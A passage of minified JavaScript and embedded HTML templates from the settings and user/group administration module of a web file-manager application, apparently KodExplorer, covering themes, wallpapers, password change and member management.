i=a.data;if(a.data="",!core.tools.about(i))return;a.data=i}var o=$(".menu-left .selected").clone();o.find(".ripple-father").remove();var r="
    "+o.html()+"
    ",l=n(e),c=template.compile(l),d=c({urlDecode:urlDecode,LNG:LNG,G:G,data:a.data,info:a.info});$(".main").html(r+d),$(".main").fadeIn("fast"),"fav"==e&&Fav.init(t),"member"==e&&System.init(),"theme"==e&&s(),t=e,$("a,img").attr("draggable","false")}})},s=function(){seajs.use("lib/bootstrap-slider/bootstrap-slider.css"),seajs.use("lib/colorpicker/css/colorpicker.css"),e.async("lib/bootstrap-slider/bootstrap-slider.js",function(){$(".control-slider").slider().on("slide",a)}),e.async("lib/colorpicker/js/colorpicker",function(){$(".colorpicker").remove(),$(".color-picker").ColorPicker({onBeforeShow:function(e){$(e).attr("input-name",$(this).attr("name")),$(this).ColorPickerSetColor(this.value)},onShow:function(e){return $(e).fadeIn(100),!1},onHide:function(e){return $(e).fadeOut(100),!1},onChange:function(e,t){var i=$($(this).data("colorpicker").el);i.val("#"+t),i.parent().find(".btn i").css("background",i.val()),a()}}).bind("keyup",function(){$(this).ColorPickerSetColor(this.value),$(this).parent().find(".btn i").css("background",$(this).val())}),$(".color-picker-view").click(function(){$(this).parent().find(".color-picker").click()})});var t=$(".theme-diy-setting");t.find("input[name]").unbind("change").bind("change",function(){var e=$(this).attr("name");"bgType"==e&&($(".theme-bg-type-image,.theme-bg-type-color").addClass("hidden"),$(".theme-bg-type-"+$(this).val()).removeClass("hidden")),$(this).attr("data-slider-value")||a()}),t.find(".theme-diy-save").unbind("click").bind("click",function(){var e=G.userConfig.themeDIY;$.ajax({url:G.appHost+"setting/set&k=themeDIY&v="+urlEncode(jsonEncode(e)),dataType:"json",success:function(e){Tips.tips(e)}})}),t.find(".color-list").each(function(){var e=jsonDecode($(this).attr("data-color"));$(this).css("background-image","linear-gradient("+e.colorRotate+"deg,"+e.startColor+","+e.endColor+")")}),t.find(".color-list").unbind("click").bind("click",function(){var e=jsonDecode($(this).attr("data-color"));$.each(e,function(e,i){var n=t.find("input[name="+e+"]");"colorRotate"==e?$("#colorRotate").slider("setValue",parseInt(i)):n.val(i),a()})});var a=function(){if("diy"==LocalData.get("theme")){var e={};t.find("input[name]").each(function(){var a=$(this).attr("name"),i=$(this).val();"checkbox"==$(this).attr("type")?i=Number($(this).is(":checked")):"radio"==$(this).attr("type")&&(i=t.find("[name="+a+"]:checked").val()),e[a]=i}),LocalData.setConfig("kodStyleDiy",e),core.setSkin("diy"),ShareData.frameTop("",function(e){e.ui.setTheme("diy")})}}},r=function(){1!=G.isRoot&&$("ul.setting #system").remove(),G.isRoot||core.authCheck("systemMember.get")||core.authCheck("systemGroup.get")?$("ul.setting #member").show():$("ul.setting #member").hide(),t=location.hash.split("#",2)[1],o(t),$("ul.setting a").click(function(){t!=$(this).attr("id")&&(t=$(this).attr("id"),o(t))}),$("#password-new").keyEnter(function(){Setting.tools()}),$(".setting-user-basic .form-row input").die("change").live("change",function(){var e=$(this),t=e.attr("name"),a=e.val();"checkbox"==e.attr("type")&&(a=e.prop("checked")?"1":"0"),l(t,a)}),$(".path-select").die("click").live("click",function(){core.api.pathSelect({type:"file",title:LNG.path_api_select_image,allowExt:"png|jpg|bmp|gif|jpeg|ico|svg|tiff"},function(e){var e=core.path2url(e);$(".path-select").parent().find("input[type=text]").val(e).trigger("change"),Setting.tools()})}),$(".randomImage").die("click").live("click",function(){var e=$(this),t=function(e){var t=G.myDesktop+"wallpage/";$.get(G.appHost+"explorer/mkdir&repeat_type=replace&path="+t,function(){$.get(G.appHost+"explorer/serverDownload&type=download&savePath="+t+"&url="+urlEncode(e))})};core.api.randomImage(function(a){e.addClass("moveCircle"),e.parent().find("input[type=text]").val(a).trigger("change"),1==$('.box[data-type="wall"]').length&&Setting.tools(),setTimeout(function(){e.removeClass("moveCircle")},1e3),t(a)})}),$(".box .list").live("hover",function(){$(this).addClass("listhover")},function(){$(this).toggleClass("listhover")}).live("click",function(){var e=$(this),t=e.parent();switch(type=t.attr("data-type"),value=e.attr("data-value"),t.find(".this").removeClass("this"),e.addClass("this"),type){case"wall":var i=G.staticPath+"images/wall_page/"+value+".jpg";$("#wallpage-url").val(""),ShareData.frameTop("",function(e){e.ui.setWall(i)});break;case"theme":a(value);break;default:}l(type,value)}),$(".nav a").live("click",function(){$(".nav a").removeClass("this"),$(this).addClass("this");var e=$(this).attr("data-page"),t=$(this).parent().parent();t.find(".setting-tab").addClass("hidden"),t.find("."+e).removeClass("hidden").hide().fadeIn(200)})},l=function(e,t){var a=G.appHost+"setting/set&k="+e+"&v="+t;$.ajax({url:a,dataType:"json",success:function(e){e.code?Tips.tips(e):core.authCheck("setting.set")?Tips.tips(LNG.config_save_error_file,!1):Tips.tips(LNG.config_save_error_auth,!1)}})},c=function(){var e=$(".selected").attr("id");switch(e){case"user":var t=urlEncode($("#password-now").val()),a=urlEncode($("#password-new").val());if(""==a||""==t){Tips.tips(LNG.password_not_null,"error");break}$.ajax({url:G.appHost+"user/changePassword&passwordNow="+t+"&passwordNew="+a,dataType:"json",success:function(e){if(Tips.tips(e),e.code){var t=ShareData.frameTop();t.location.href=G.appHost+"user/logout"}}});break;case"wall":var i=$("#wallpage-url").val();if(""==i){Tips.tips(LNG.picture_can_not_null,"error");break}ShareData.frameTop("",function(e){e.ui.setWall(i)}),$(".box").find(".this").removeClass("this"),$.ajax({url:G.appHost+"setting/set&k=wall&v="+urlEncode(i),dataType:"json",success:function(e){Tips.tips(e) +}});default:}};return r(),{setGoto:o,tools:c,setThemeSelf:i,setTheme:a}}),define("app/src/setting/page/about.html",[],'
    \n
    {{@data}}
    \n
    \n'),define("app/src/setting/page/fav.html",[],'\n'),define("app/src/setting/page/help.html",[],'
    \n
    {{@data}}
    \n
    \n'),define("app/src/setting/page/member.html",[],'
    \n
    \n
    \n
    {{LNG.system_group_edit}}
    \n
    {{LNG.system_group_role}}
    \n
    \n
    \n
    \n
    \n
    \n\n \n
    \n \n\n
    \n
    \n
    \n --\n id:\n \n\n \n \n 111/1.5\n
    \n
    \n
    \n
    \n
    \n \n\n \n \n
    \n\n\n\n'),define("app/src/setting/page/system.html",[],'\n\n{{if G.isRoot}}\n
    \n {{if kod.window.core.versionType !="A"}}\n \n {{/if}}\n\n {{if verIndex={"A":"free","O":"1","P":"2","Q":"3","R":"4","S":"5","T":"6"} }}{{/if}}\n {{if verKey = "version_vip_"+verIndex[kod.window.core.versionType] }}{{/if}}\n {{LNG[verKey]}}\n
    \n{{/if}}\n\n\n
    \n
    \n
    \n
    {{LNG.system_name}}:
    \n
    \n \n {{LNG.system_name_desc}}\n \n
    \n
    \n
    \n\n
    \n
    {{LNG.system_desc | kod.window.htmlEncode}}:
    \n
    \n \n {{LNG.system_desc}}\n
    \n
    \n
    \n
    \n
    {{LNG.path_hidden}}:
    \n
    \n \n {{LNG.path_hidden_desc}}\n
    \n
    \n
    \n
    \n
    {{LNG.new_user_folder}}:
    \n
    \n \n {{LNG.new_user_folder_desc}}\n
    \n
    \n
    \n
    \n
    {{LNG.new_user_app}}:
    \n
    \n \n {{LNG.new_user_app_desc}}\n
    \n
    \n
    \n
    \n
    {{LNG.auto_login}}:
    \n
    \n \n
    \n
    \n
    \n\n
    \n
    {{LNG.first_in}}:
    \n
    \n \n \n \n
    \n
    \n
    \n\n \n
    \n
    \n \n
    \n
    \n
    \n
    \n\n \n
    \n\n\n\n\n\n\n\n\n\n\n'),define("app/src/setting/page/theme.html",[],'
    \n
    \n {{each data.settingAll.themeall.split(\',\') value key}}\n
    \n
    \n
    {{@LNG[\'theme_\'+value]}}
    \n
    \n {{/each}}\n\n {{each data.settingAll.themeall.split(\',\') value key}}\n
    \n {{/each}}\n \n
    \n
    \n
    \n\n{{if config = G.userConfig.themeDIY}}{{/if}}\n
    \n

    {{LNG.theme_diy_title}}

    \n
    \n
    \n
    {{LNG.theme_diy_background}}:
    \n
    \n \n \n
    \n
    \n
    \n\n
    \n
    \n
    {{LNG.theme_diy_image_blur}}:
    \n
    \n \n
    \n
    \n
    \n
    \n
    {{LNG.theme_diy_image_url}}:
    \n
    \n \n \n \n
    \n
    \n
    \n
    \n\n
    \n
    \n
    {{LNG.theme_diy_color_start}}:
    \n
    \n \n \n
    \n
    \n
    \n
    \n
    {{LNG.theme_diy_color_end}}:
    \n
    \n \n \n
    \n
    \n
    \n
    \n
    {{LNG.theme_diy_color_radius}}:
    \n
    \n \n
    \n
    \n
    \n\n
    \n
    \n
    \n
    \n
    \n
    \n
    \n
    \n
    \n
    \n
    \n
    \n
    \n\n \n
    \n
    \n
    \n \n
    \n
    \n
    \n\n
    \n
    \n'),define("app/src/setting/page/user.html",[],'\n\n
    \n
    \n
    \n
    {{LNG.recycle_open_if}}:
    \n
    \n \n
    \n
    \n
    \n\n\n
    \n
    {{LNG.setting_user_animate_open}}:
    \n
    \n \n
    \n
    \n
    \n\n
    \n
    {{LNG.setting_user_sound_open}}:
    \n
    \n \n
    \n
    \n
    \n
    \n\n
    \n
    {{LNG.upload_exist}}:
    \n
    \n \n \n \n
    \n
    \n
    \n
    \n
    \n\n
    \n
    {{LNG.setting_user_imageThumb}}:
    \n
    \n \n
    \n
    \n
    \n
    \n
    {{LNG.setting_user_fileSelect}}:
    \n
    \n \n
    \n
    \n
    \n\n\n \n
    \n
    \n \n
    \n
    \n
    \n
    \n
    \n\n\n\n'),define("app/src/setting/page/wall.html",[],'
    \n
    \n {{each data.settingAll.wallall.split(\',\') value key}}\n
    \n
    \n
    \n {{/each}}\n {{each data.settingAll.wallall.split(\',\') value key}}\n
    \n {{/each}}\n
    \n
    \n
    \n\n\n
    \n

    {{LNG.setting_wall_diy}}

    \n
    \n
    \n
    URL:
    \n
    \n 3}}value="{{data.user.wall}}"{{/if}}/> \n \n \n
    \n
    \n
    \n\n \n
    \n
    \n
    \n \n
    \n
    \n
    \n
    \n
    \n'),define("app/src/setting/system/systemSetting",[],function(){var e=function(){$("input[name='firstIn']").live("click",function(){$("input[name='firstIn']").removeAttr("checked"),$(this).attr("checked","checked") }),$(".setting-save").die("click").live("click",function(){var e={};$(this).parents(".setting-tab").find(".form-row [name]").each(function(){var t=$(this),a=t.attr("name");e[a]="checkbox"==t.attr("type")?void 0==t.attr("checked")?"0":"1":"radio"==t.attr("type")?$("[name="+a+"]:checked").val():urlEncode(t.val())}),n(e)}),$(".system-setting-more").die("click").live("click",function(){if(G.isRoot){var e=G.basicPath+"config/setting_user.php",t=ShareData.frameTop();if(t.Editor!==void 0)return t.Editor.add(urlEncode(e)),void 0;if(ShareData.frameTop("OpenopenEditor")){var a=t.$.dialog.list.openEditor,i=0;a&&("hidden"==$("."+a.config.id).css("visibility")&&(i=200),a.display(!0).zIndex().focus()),setTimeout(function(){ShareData.frameTop("OpenopenEditor",function(t){t.Editor.add(urlEncode(e))})},i)}else{var n=G.appHost+"editor/edit#filename="+urlEncode(e);core.openDialog(n,core.icon("edit"),htmlEncode(e),"openEditor")}}}),t(),a(),i()},t=function(){$(".phpinfo").die("click").live("click",function(){$.dialog.open(G.appHost+"setting/phpInfo&accessToken="+G.accessToken,{title:"php_info",width:"70%",height:"65%",resize:!0})}),$.get(G.appHost+"setting/slider&slider=system&env_check=1",function(e){if(e&&""!=e.data){Tips.tips(e.data,"warning");var t=$(".check-evn-error");t.removeClass("hidden"),t.find(".error-content").html(e.data)}})},a=function(){$('.setting-menu .menu-list input[name="target"]').live("click",function(){"_blank"==$(this).val()?($(this).val("_self"),$(this).removeAttr("checked")):($(this).val("_blank"),$(this).attr("checked","checked"))}),$(".setting-menu .system-menu-add").die("click").live("click",function(){var e=$(".menu-default").clone().removeClass("menu-default hidden").addClass("menu-list");e.insertAfter(".setting-menu .menu-list:last")}),$(".setting-menu .menu-list .move-up").die("click").live("click",function(){var e=$(this).parent().parent();e.prev().hasClass("menu-list")&&e.insertBefore(e.prev())}),$(".setting-menu .menu-list .move-down").die("click").live("click",function(){var e=$(this).parent().parent();e.next().hasClass("menu-list")&&e.insertAfter(e.next())}),$(".setting-menu .menu-list .move-hidden").die("click").live("click",function(){var e=$(this).parent().parent();e.hasClass("menu-hidden")?(e.removeClass("menu-hidden"),$(this).text(LNG.menu_hidden)):(e.addClass("menu-hidden"),$(this).text(LNG.menu_show))}),$(".setting-menu .menu-list .move-del").die("click").live("click",function(){var e=$(this).parent().parent();e.remove()}),$(".system-menu-save").die("click").live("click",function(){var e=[];$(".setting-menu .menu-list").each(function(){var t=$(this),a={};t.hasClass("menu-default")||(t.find("input").each(function(){a[$(this).attr("name")]=urlEncode($(this).attr("value"))}),""!=a.name&&(a.use="1",a.type="",t.hasClass("menu-hidden")&&(a.use="0"),t.hasClass("menu-system")&&(a.type="system"),e.push(a)))}),n({menu:e})})},i=function(){$("[system-tools]").die("click").live("click",function(){var e=$(this),t=e.attr("system-tools"),a=htmlRemoveTags(e.html());e.addClass("disabled").html(LNG.loading),Tips.loading(LNG.loading),$.ajax({url:G.appHost+"setting/systemTools&action="+t,dataType:"json",error:function(t,i,n){core.ajaxError(t,i,n),Tips.close(LNG.error,!1),e.removeClass("disabled").html(a)},success:function(t){Tips.close(t),setTimeout(function(){e.removeClass("disabled").html(a)},300)}})})},n=function(e){$.ajax({url:G.appHost+"setting/systemSetting",type:"POST",data:"accessToken="+G.accessToken+"&data="+urlEncode(jsonEncode(e)),dataType:"json",success:function(e){Tips.tips(e)}})};1==G.isRoot&&e()}),define("app/src/setting/system/system",["lib/contextMenu/jquery-contextMenu","lib/ztree/ztree","./systemMember","./systemGroup","./systemRole","./systemGroupRole"],function(e){e("lib/contextMenu/jquery-contextMenu"),e("lib/ztree/ztree");var t=e("./systemMember"),a=e("./systemGroup"),i=e("./systemRole"),n=e("./systemGroupRole"),o=function(){s("system-group"),r(),n.init(function(){i.init(),a.init()})},s=function(e){$(".system-content .this").removeClass("this"),$(".system-content #"+e).addClass("this"),$(".left-content").addClass("hidden"),$("."+e).removeClass("hidden"),$(".right-frame").addClass("hidden"),$("#content-"+e).removeClass("hidden")},r=function(){$(".left-header .tab").die("click").live("click",function(){var e=$(this).attr("id");s(e)})},l=function(e){e.each(function(){var e=core.userSpaceHtml($(this).html());$(this).html(e)})},c=function(e){var t=G.userPath+e.path+"/home/";e.groupID&&(t=G.groupPath+e.path+"/home/"),e.homePath&&(t=e.homePath),window.parent&&window.parent.core&&window.parent.core.isApp("explorer")?(window.parent.ui.path.list(t),Tips.tips(LNG.system_open_true_path,!0)):core.explorer(t)};return{init:o,sizeUse:l,openPath:c,dataList:core.tools.systemData,systemMember:t,systemGroup:a,systemRole:i,systemGroupRole:n}}),define("app/src/setting/system/systemMember",[],function(e){var t,a,i=function(e){return void 0!=t?(n(e),void 0):($.ajax({url:G.appHost+"systemMember/get",dataType:"json",success:function(a){return a.code?(t=System.dataList(a,"member"),n(e),void 0):(Tips.tips(a),void 0)},error:function(){return!1}}),void 0)},n=function(i){(""==i||void 0==i)&&(i=a),a=i;var n=e("./tpl/userList.html"),o=template.compile(n),s=o({LNG:LNG,selectGroup:i,userList:t,groupRoleList:System.systemGroupRole.getList(),groupList:System.systemGroup.getList(),roleList:System.systemRole.getList()});$(".user-list-content").html(s),$(".button-aciton-muti button").addClass("disabled"),System.sizeUse($("#content-system-group .user-list-cell .space"))},o=function(e,n,o){if(void 0!=n){"object"!=typeof n&&(n=[n]);var s={del:LNG.system_member_remove_tips,statusSet:"",roleSet:LNG.system_member_set_role,groupReset:"",groupRemoveFrom:LNG.system_member_remove_group,groupAdd:""},r=function(){$.ajax({url:G.appHost+"systemMember/doAction&action="+e,type:"POST",data:"userID="+jsonEncode(n)+"¶m="+o,dataType:"json",beforeSend:function(){Tips.loading()},error:core.ajaxError,success:function(e){Tips.close(e),$.dialog.list["share-dialog"]&&$.dialog.list["share-dialog"].close(),t=void 0,i(a)}})};""==s[e]?r():$.dialog({id:"dialog-user-confirm",fixed:!0,icon:"question",padding:30,width:250,lock:!0,background:"#000",opacity:.2,content:s[e],ok:function(){r()},cancel:!0})}},s="write",r=function(e){u(c(e))},l=function(e){u(c(e),!0)},c=function(e){var t={1:s};return t[e]=s,{userID:"",name:"",password:"123456",role:"default",groupInfo:t,config:{sizeMax:"2",sizeUse:"0"}}},d=function(){var e=1073741824*parseFloat($(".size-max-set input").val()),t=pathTools.fileSize(e);0==e||isNaN(e)?$(".size-max-set i").html(LNG.space_tips_default):$(".size-max-set i").html(t)},p=function(){var e=System.systemGroup.getList(),t=System.systemGroupRole.getList(),a=jsonDecode($("#group-info-list").attr("value")),i="";for(var n in a)if(e[n]){var o=a[n];o="read"==o?"1":o,o="write"==o?"2":o;var s=t[o]?t[o]:t["1"];i+=''+e[n].name+""}$(".dialog-group-display .cell").html(i+'
    ')},u=function(n,s){var r=System.systemRole.getList(),l=e("./tpl/user.html");s&&(l=e("./tpl/userImport.html"));var c=template.compile(l),u=c({LNG:LNG,userInfo:n,roleList:r}),h=$.dialog({id:"share-dialog",simple:!0,resize:!1,width:425,background:"#000",opacity:.1,title:"",padding:"0",fixed:!0,lock:!0,content:u});d(),System.sizeUse($(".share-view-info")),$("#group-info-list").val(jsonEncode(n.groupInfo)),$(".dlg-group-select").unbind("click").bind("click",function(){f($("#group-info-list").val(),function(e){$("#group-info-list").val(e),p()})}),p(),$(".input-line #name").textFocus();var m=G.appHost+"systemMember/add";s?m=G.appHost+"systemMember/add&isImport=1":""==n.name?$(".share-action .remove-button").hide():m=G.appHost+"systemMember/edit&userID="+n.userID,$("#system-save").unbind("click").bind("click",function(){v()}),$(".select-drop-menu a").unbind("click").bind("click",function(){$(this).parent().parent().find("a").removeClass("selected"),$(this).addClass("selected"),$(".select-drop-menu .role_title").html($(this).html()),$("#role").val($(this).attr("data-role-id"))}),$(".remove-button").unbind("click").bind("click",function(){o("del",n.userID,"")}),$(".dialog-goto-path").unbind("click").bind("click",function(){System.openPath(n)}),$(".content-box input").keyEnter(function(){v(!0)}),$("#system-save-and-add").unbind("click").bind("click",function(){v(!0)}),$(".user-setting-more-btn").unbind("click").bind("click",function(){$(".user-setting-more").toggleClass("hidden")}),$(".select-path a.select-btn").unbind("click").bind("click",function(){var e=this;core.api.pathSelect({type:"folder",title:LNG.path_api_select_folder,firstPath:$(".select-path input").val()},function(t){$(e).parent().find("input").val(t)})}),$(".select-path a.reset").unbind("click").bind("click",function(){$(this).parent().find("input").val("")});var v=function(e){s&&(e=!1);var o={};$(".share-dialog .content-info [name]").each(function(){var e=urlEncode($(this).val());""!=e&&(o[$(this).attr("name")]=e)}),$.ajax({url:m,data:o,type:"POST",dataType:"json",beforeSend:function(){Tips.loading()},error:core.ajaxError,success:function(o){return Tips.close(o),o.code||"version_error"!=o.info?o.code?(t=void 0,i(a),s?h.close():""!=n.name||1!=e?h.close():$(".input-line #name").val("").textFocus(),void 0):(s&&$("#name").val(o.info),void 0):($.dialog({content:o.data,padding:"30px 25px",width:"300px",okVal:LNG.learn_more,ok:function(){window.open(core.versionUpdateVip)}}),void 0)}})}},f=function(t,a){var i=System.systemGroup.getListTree(),n=System.systemGroup.getList();t=jsonDecode(t),$.isArray(t)&&(t={});var o={view:{showLine:!1,selectedMulti:!1,dblClickExpand:!1,addDiyDom:function(e,t){var a=12,i=$("#"+e+" #"+t.tId+"_switch"),n=$("#"+e+" #"+t.tId+"_ico");if(n.before(i).after('').before(''+core.iconSmall("group-guest")+"").removeClass("ico_docu").addClass("group_icon").remove(),t.level>=1){var o="";i.before(o)}$("#"+e+" #"+t.tId+"_a").attr("data-group-id",t.id)}},callback:{onClick:function(e,a,i){t||(t={}),$("#"+i.tId+"_a").hasClass("this")?delete t[i.id]:t[i.id]=s,c()}}},r=function(){var e=$("#user-group-select");$.fn.zTree.init(e,o,i);var t=$.fn.zTree.getZTreeObj("user-group-select");t&&t.expandAll(!0)},l=function(){var i=e("./tpl/groupSelect.html"),n=template.compile(i),o=n({LNG:LNG});$.dialog({id:"select_usre_group_dlg",title:LNG.system_member_group_edit,padding:"0",width:540,lock:!0,background:"#fff",opacity:.1,fixed:!0,content:o,ok:function(){a(jsonEncode(t))},cancel:!0}),r()},c=function(){var e="";$("#user-group-select .curSelectedNode").removeClass("curSelectedNode"),$("#user-group-select a[data-group-id]").removeClass("this");var a=function(e){var t=System.systemGroupRole.getList();e="read"==e?"1":e,e="write"==e?"2":e;var a=t[e]?t[e]:t["1"],i="";var r='
    '+i+"
    ";return r};for(var i in t)n[i]&&($("#user-group-select a[data-group-id="+i+"]").addClass("this"),e+='
  • '+' '+n[i].name+""+' '+a(t[i])+"
  • ");$(".select-group-right").html(e)},d=function(){$(".right-content .group-self .remove").die("click").live("click",function(){var e=$(this).parent().attr("group-id");delete t[e],c()}),$(".group-self .dropdown-menu li").die("click").live("click",function(){var e=$(this).attr("data-info"),a=$(this).parent().attr("data-current"),i=$(this).parent().parent().parent().attr("group-id");a!=e&&(t[i]=e,c())})};l(),c(),d()},h=function(){$(".context-menu-list").filter(":visible").trigger("contextmenu:hide")},m=function(){$("body").click(h).contextmenu(h),$.contextMenu({zIndex:9999,selector:".user-action-menu",items:{"user-list-edit":{name:LNG.edit,icon:"edit",accesskey:"e"},sep1:"--------","user-remove":{name:LNG.remove,icon:"trash",accesskey:"d"},"user-status-close":{name:LNG.system_member_unuse,icon:"",accesskey:"c"},"user-status-open":{name:LNG.system_member_use,icon:"",accesskey:"o"},sep2:"--------","group-remove-from":{name:LNG.system_member_group_remove,icon:"",accesskey:"g"},"group-add":{name:LNG.system_member_group_insert,icon:"",accesskey:"a"},"group-reset":{name:LNG.system_member_group_reset,icon:"",accesskey:"i"}},callback:function(e,t){var a=t.$trigger.attr("data-id");$("#content-system-group .group-id").html();var i=[a];g(e,i,"")}})},v=function(){$(".size-max-set input").live("input",d),$("#content-system-group .content [data-action]").live("click",function(e){if(!$(e.target).is("input")){var t=$(this),a=t.attr("data-action"),i=[];if($("#content-system-group .user-select:checked").each(function(){i.push($(this).parent().parent().attr("data-id"))}),"user-list-edit"==a){var n=t.parent().parent().attr("data-id");i=[n]}return g(a,i,t,e),!0}})},g=function(e,a,i,n){var s=$("#content-system-group .group-id").html();switch(e){case"user-add":r(s);break;case"user-import":l(s);break;case"group-remove-from":o("groupRemoveFrom",a,s);break;case"group-add":f("{}",function(e){o("groupAdd",a,e)});break;case"group-reset":f("{}",function(e){o("groupReset",a,e)});break;case"role-set":var c=i.attr("data-role-id");o("roleSet",a,c);break;case"user-status-open":o("statusSet",a,1);break;case"user-status-close":o("statusSet",a,0);break;case"user-remove":o("del",a,"");break;case"user-list-select":var d=i.find(".user-select");d.attr("checked")?d.removeAttr("checked"):d.attr("checked","true"),b();break;case"user-list-edit":u(t[a[0]]),stopPP(n);break;default:}},b=function(){$("#content-system-group .user-select:checked").length>=1?$(".button-aciton-muti button").removeClass("disabled"):$(".button-aciton-muti button").addClass("disabled"),$("#content-system-group .user-list-cell ").removeClass("selected"),$("#content-system-group .user-select:checked").each(function(){$(this).parent().parent().addClass("selected")})},y=function(){$("#content-system-group .user-select-set").live("click",function(){$(this).attr("checked")?$("#content-system-group .user-select").attr("checked","true"):$("#content-system-group .user-select").removeAttr("checked"),b()}),$("#content-system-group .user-select").live("click",function(){b()})};return y(),v(),m(),{resetUserList:n,userDefaultData:c,resetList:function(){t=void 0},loadList:i,add:r}}),define("app/src/setting/system/tpl/userList.html",[],'
    \n
    \n \n \n \n
    \n \n
    \n \n \n
    \n\n
    \n \n \n \n
    \n
    \n
    \n \n \n \n \n \n \n \n \n \n {{each userList v i}}\n {{if v && (selectGroup==\'1\' || v.groupInfo[selectGroup]) }}\n \n \n \n \n \n \n \n {{/if}}\n {{/each}}\n \n
    {{LNG.username}}{{LNG.system_member_role}}{{LNG.space_size_use}}{{LNG.system_member_group}}
    \n {{if v.userID!=\'1\'}}{{/if}}\n \n {{v.name}}\n {{v.userID}}\n {{roleList[v.role]}}{{v.config.sizeUse}}/{{v.config.sizeMax}}\n {{each v.groupInfo groupRoleID groupID}}\n {{if groupList[groupID]}} \n {{if groupRoleID = groupRoleID == "read" ? "1":groupRoleID}}{{/if}}\n {{if groupRoleID = groupRoleID == "write" ? "2":groupRoleID}}{{/if}}\n {{if groupRoleList[groupRoleID]? "":groupRoleID="1" }}{{/if}}\n {{if groupRoleInfo = groupRoleList[groupRoleID]}}{{/if}}\n \n {{groupList[groupID][\'name\']}}\n \n {{else}}\n \n {{/if}}\n {{/each}}\n
    \n
    \n\n\n'),define("app/src/setting/system/tpl/user.html",[],'
    \n
    \n
    \n {{if !userInfo.name}}\n {{LNG.system_member_add}}\n {{else}}\n {{userInfo.name}} \n {{/if}}\n
    \n {{if userInfo.name}}\n \n {{/if}} \n
    \n
    \n
    \n {{LNG.username}}:\n \n {{if userInfo.name}}\n \n \n \n {{else}}\n {{LNG.username}}\n {{/if}}\n
    \n
    \n
    \n {{LNG.password}}:\n \n {{if userInfo.name}}{{LNG.system_member_password_tips}}{{/if}}\n
    \n
    \n
    \n {{LNG.space_size}}:\n \n \n
    \n
    \n
    \n {{LNG.system_member_role}}:\n \n
    \n \n \n
    \n\n \n {{LNG.more}}\n
    \n
    \n\n
    \n
    \n {{LNG.system_set_home_path}}:\n \n \n \n \n \n \n \n
    \n
    \n
    \n\n
    \n {{LNG.system_member_group}}:\n \n
    \n
    \n \n
    \n
    \n
    \n
    \n\n \n
    \n'),define("app/src/setting/system/tpl/userImport.html",[],'
    \n
    \n
    \n {{LNG.system_member_import}}\n
    \n
    \n
    \n
    \n {{LNG.username}}:\n \n {{@LNG.system_member_import_desc}}\n
    \n
    \n
    \n {{LNG.password}}:\n \n
    \n
    \n
    \n {{LNG.space_size}}:\n \n \n
    \n
    \n
    \n {{LNG.system_member_role}}:\n \n
    \n \n \n
    \n\n \n {{LNG.system_member_role}}\n
    \n
    \n
    \n {{LNG.system_member_group}}:\n \n\n
    \n
    \n \n
    \n
    \n
    \n
    \n\n \n
    \n'),define("app/src/setting/system/tpl/groupSelect.html",[],'
    \n
    \n
    \n {{LNG.system_group_select}}:\n {{LNG.system_group_select_result}}:\n
    \n
    \n
    \n
    \n
      \n
      \n
      \n
      \n
      \n'),define("app/src/setting/system/systemGroup",[],function(e){var t,a,i,n,o=function(){p(),c(),$(".ztree .switch").die("mouseenter").live("mouseenter",function(){$(this).addClass("switch_hover")}).die("mouseleave").live("mouseleave",function(){$(this).removeClass("switch_hover")}),$(".menuGroup").die("mouseenter").live("mouseenter",function(){$(this).addClass("hover")}).die("mouseleave").live("mouseleave",function(){$(this).removeClass("hover")}),G.isRoot||$("[data-action=group-home").addClass("hidden")},s={view:{showLine:!1,selectedMulti:!1,dblClickExpand:!0,addDiyDom:function(e,t){var a=12,i=$("#"+e+" #"+t.tId+"_switch"),n=$("#"+e+" #"+t.tId+"_ico");if(n.before(i).before(''+core.iconSmall("group-guest")+"").remove(),t.level>=1){var o="";i.before(o)}$("#"+e+" #"+t.tId+"_a").addClass("menuGroup").append("").attr("data-group-id",t.id)}},callback:{onClick:function(e,t,a){r(t,a.id)},beforeRightClick:function(e,t){r(e,t.id)}}},r=function(e,a){if("folder-list-tree"==e){n=a;var i=t.getNodeByParam("id",a,null);t.selectNode(i),y(a)}else"group-parent-select"==e&&($("input[name=parentID]").val(a),$(".select-group").addClass("hidden"),v())},l=function(e){var t=function(e){for(var a=0;e.length>a;a++)void 0!=e[a]?(e[a].pid=e[a].parentID,e[a].id=e[a].groupID,delete e[a].children,delete e[a].parentID,delete e[a].groupID,e[a].child&&(e[a].children=e[a].child,delete e[a].child,t(e[a].children))):delete e[a]},a=[],i=$.extend(!0,{},e);for(var n in i){var o=i[n],s=o.parentID;if(i[s])i[s].child||(i[s].child=[]),i[s].child.push(i[o.groupID]);else{var r=i[o.groupID];r&&a.push(r)}}return t(a),a},c=function(){$.ajax({url:G.appHost+"systemGroup/get",dataType:"json",error:function(){$("#folder-list-tree").html('
      '+LNG.system_error+"
      ")},success:function(e){return e.code?(i=System.dataList(e,"group"),a=l(i),$.fn.zTree.init($("#folder-list-tree"),s,a),t=$.fn.zTree.getZTreeObj("folder-list-tree"),t.expandAll(!0),void 0==n&&(n="1"),r("folder-list-tree",n),0!=$("#group-parent-select").length&&g(),void 0):($("#folder-list-tree").html('
      '+LNG.system_error+"
      "),void 0)}})},d=function(){$(".context-menu-list").filter(":visible").trigger("contextmenu:hide")},p=function(){$("body").click(d).contextmenu(d),$.contextMenu({zIndex:9999,selector:".menuGroup",items:{"add-child":{name:LNG.system_group_add,icon:"plus",accesskey:"u"},edit:{name:LNG.edit,icon:"edit",accesskey:"e"},sep1:"--------","add-user":{name:LNG.system_member_add,icon:"user",accesskey:"g"},sep2:"--------",remove:{name:LNG.remove,icon:"remove-sign",accesskey:"r"}},callback:function(e,a){var i=a.$trigger.attr("id");i=i.replace("_a","");var n=t.getNodeByTId(i);switch(e){case"add-child":var o=u();o.parentID=n.id,b(o);break;case"edit":var o=u(n.id);b(o);break;case"add-user":System.systemMember.add(n.id);break;case"remove":h(n.id);break;default:}}}),$(".sub-menu").die("click").live("click",function(e){$(this).contextMenu({x:e.pageX,y:e.pageY})})},u=function(e){return void 0==e?f():i[e]},f=function(){return{groupID:"",name:"",parentID:"",children:"",config:{sizeMax:"0",sizeUse:""},path:"",createTime:""}},h=function(e,a){var 